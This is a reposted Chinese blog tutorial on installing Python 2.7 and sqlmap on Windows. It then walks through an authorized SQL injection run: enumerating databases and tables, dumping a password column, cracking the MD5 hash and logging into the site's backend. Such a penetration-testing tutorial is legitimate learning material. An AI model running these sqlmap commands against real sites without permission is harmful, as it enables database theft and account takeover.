(1)python27安装
python2.7 下载地址 这里可以任意选择一个2.7的版本进行下载. 安装的时候最好自己新建一个python文件夹安装(我这里安装路径为D:pythonpython2.7) 
(2)sqlmap安装
1.sqlmap的 下载地址 这里点击压缩文件进行下载,解压的时候需要解压到到python2.7的路径下面 (我这里安装路径为D:pythonpython2.7) 
2.看到保证下面文件中有sqlmap 
(3)配置环境变量
1.我的电脑打开属性 2.点击高级系统设置 
3.点击环境变量 
4.找到Path和PATHEXT两个系统变量进行配置 
5.打开Path,加入两个环境变量
D:\python\python2.7\sqlmapD:\python\python2.7
6.点击PATHEXT,在最后加上.py 
7.全部设置完之后就配置好了
(4)验证是否配置完成
进入sqlmap文件 
在地址栏输入cmd打开DOS 
在命令行页面输入python sqlmap.py
显示这个样子说明配置成功
(1)常用语法及其说明
(2)sqlmap的使用说明
以上参数均可配合操作,在实战中,还要注意敏感的数据库信息。
实战操作
- 查找数据库 命令:python sqlmap.py -u "URL" --dbs 在这里我们可以看到该数据库为mysql 也了解到这个站参在盲注和 union注入类型 这里很明显有一个很重要的数据库 information_schema
- 查找数据库中的表 命令:python sqlmap.py -u "URL" -D 数据库名 --tables 看到数据库中有这样很明显的特殊的表名
- 查询表里面有什么字段 这里看到了很明显的adminuser、password、password2
- 查看密码 命令:python sqlmap.py -u “URL” -D 数据库名 -T password2 --dump
拿到密码,这很明显是md5加密 5. 找到md5破解网站 破解成功:密码为111111 
6.最后就是找到后台验证密码是否正确,如果不正确,那就重复以上操作,查询表找到密码所在。
sqlmap注入是一个非常繁琐的过程,需要有足够的耐心,这是我第一次尝试拿站(有授权),希望各位小伙伴在有授权的情况下拿站。
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/weixin_50481708/article/details/124065365